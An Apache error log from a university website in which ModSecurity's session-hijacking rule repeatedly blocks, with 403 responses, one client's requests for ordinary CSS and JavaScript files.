[Mon Aug 28 07:47:00.508493 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvuhMCo-f0AAJS0Eh8AAAAW"]
[Mon Aug 28 07:47:00.531450 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvuhMCo-f0AAJS3EX8AAAAZ"]
[Mon Aug 28 07:47:00.554938 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvuhMCo-f0AAJS1nEoAAAAX"]
[Mon Aug 28 07:47:00.558329 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvuhMCo-f0AAJSyp1wAAAAM"]
[Mon Aug 28 07:47:00.562920 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvuhMCo-f0AAJS0EiAAAAAW"]
[Mon Aug 28 07:47:00.563440 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvuhMCo-f0AAJS2FXgAAAAY"]
[Mon Aug 28 07:47:00.581356 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvuhMCo-f0AAJS3EYAAAAAZ"]
[Mon Aug 28 07:47:00.586797 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvuhMCo-f0AAJS1nEsAAAAX"]
[Mon Aug 28 07:47:00.597072 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvuhMCo-f0AAJS0EiEAAAAW"]
[Mon Aug 28 07:47:00.597388 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvuhMCo-f0AAJS2FXkAAAAY"]
[Mon Aug 28 07:47:00.604998 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvuhMCo-f0AAJS3EYEAAAAZ"]
[Mon Aug 28 07:47:00.614762 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvuhMCo-f0AAJSyp10AAAAM"]
[Mon Aug 28 07:47:00.631893 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvuhMCo-f0AAJS1nEwAAAAX"]
[Mon Aug 28 07:47:00.632045 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvuhMCo-f0AAJS0EiIAAAAW"]
[Mon Aug 28 07:47:00.642990 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvuhMCo-f0AAJSyp14AAAAM"]
[Mon Aug 28 07:47:00.646566 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvuhMCo-f0AAJS3EYIAAAAZ"]
[Mon Aug 28 07:47:00.671382 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvuhMCo-f0AAJSxYhoAAAAH"]
[Mon Aug 28 07:47:00.673161 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvuhMCo-f0AAJS2FXoAAAAY"]
[Mon Aug 28 07:47:00.684331 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvuhMCo-f0AAJS1nE0AAAAX"]
[Mon Aug 28 07:47:00.687796 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvuhMCo-f0AAJS3EYMAAAAZ"]
[Mon Aug 28 07:47:00.703862 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvuhMCo-f0AAJSxYhsAAAAH"]
[Mon Aug 28 07:47:00.708668 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvuhMCo-f0AAJS1nE4AAAAX"]
[Mon Aug 28 07:47:00.756974 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvuhMCo-f0AAJSyp18AAAAM"]
[Mon Aug 28 07:47:00.758044 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvuhMCo-f0AAJSxYhwAAAAH"]
[Mon Aug 28 07:47:00.774211 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvuhMCo-f0AAJS2FXsAAAAY"]
[Mon Aug 28 07:47:00.775790 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvuhMCo-f0AAJSyp2AAAAAM"]
[Mon Aug 28 07:47:00.788896 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvuhMCo-f0AAJSxYh0AAAAH"]
[Mon Aug 28 07:47:00.789320 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvuhMCo-f0AAJS1nE8AAAAX"]
[Mon Aug 28 07:47:00.815304 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvuhMCo-f0AAJS2FXwAAAAY"]
[Mon Aug 28 07:47:00.817729 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvuhMCo-f0AAJSxYh4AAAAH"]
[Mon Aug 28 07:47:00.820773 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvuhMCo-f0AAJSyp2EAAAAM"]
[Mon Aug 28 07:47:00.820895 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvuhMCo-f0AAJS1nFAAAAAX"]
[Mon Aug 28 07:47:00.840693 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvuhMCo-f0AAJS3EYQAAAAZ"]
[Mon Aug 28 07:47:00.858146 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvuhMCo-f0AAJS1nFEAAAAX"]
[Mon Aug 28 07:47:00.883459 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvuhMCo-f0AAJS2FX0AAAAY"]
[Mon Aug 28 07:47:00.907878 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvuhMCo-f0AAJS1nFIAAAAX"]
[Mon Aug 28 07:47:00.944455 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvuhMCo-f0AAJSxYh8AAAAH"]
[Mon Aug 28 07:47:00.973258 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvuhMCo-f0AAJS1nFMAAAAX"]
[Mon Aug 28 07:47:01.002915 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvuhcCo-f0AAJS3EYUAAAAZ"]
[Mon Aug 28 07:47:01.027895 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvuhcCo-f0AAJSxYiAAAAAH"]
[Mon Aug 28 07:47:01.053167 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvuhcCo-f0AAJSyp2IAAAAM"]
[Mon Aug 28 07:47:01.092493 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvuhcCo-f0AAJS1nFQAAAAX"]
[Mon Aug 28 07:47:01.118737 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvuhcCo-f0AAJSyp2MAAAAM"]
[Mon Aug 28 07:47:01.143028 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvuhcCo-f0AAJS1nFUAAAAX"]
[Mon Aug 28 07:47:01.170066 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvuhcCo-f0AAJSxYiEAAAAH"]
[Mon Aug 28 07:47:01.195998 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvuhcCo-f0AAJSyp2QAAAAM"]
[Mon Aug 28 07:47:01.239587 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvuhcCo-f0AAJS2FX4AAAAY"]
[Mon Aug 28 07:47:01.240130 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvuhcCo-f0AAJSyp2UAAAAM"]
[Mon Aug 28 07:47:01.240268 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvuhcCo-f0AAJS1nFYAAAAX"]
[Mon Aug 28 07:47:01.240744 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvuhcCo-f0AAJS0EiQAAAAW"]
[Mon Aug 28 07:47:01.276477 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvuhcCo-f0AAJSxYiIAAAAH"]
[Mon Aug 28 07:47:01.278094 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvuhcCo-f0AAJS1nFcAAAAX"]
[Mon Aug 28 07:47:01.278453 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvuhcCo-f0AAJS2FX8AAAAY"]
[Mon Aug 28 07:47:01.279361 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvuhcCo-f0AAJSyp2YAAAAM"]
[Mon Aug 28 07:47:01.300485 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvuhcCo-f0AAJS0EiUAAAAW"]
[Mon Aug 28 07:47:01.307888 2023] [:error] [pid 38065] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvuhcCo-f0AAJSxYiMAAAAH"]
[Mon Aug 28 07:47:01.307925 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvuhcCo-f0AAJSyp2cAAAAM"]
[Mon Aug 28 07:47:01.373599 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvuhcCo-f0AAJS1nFgAAAAX"]
[Mon Aug 28 07:47:01.406253 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvuhcCo-f0AAJSyp2gAAAAM"]
[Mon Aug 28 07:47:01.430485 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvuhcCo-f0AAJS0EiYAAAAW"]
[Mon Aug 28 07:47:01.454927 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvuhcCo-f0AAJS2FYAAAAAY"]
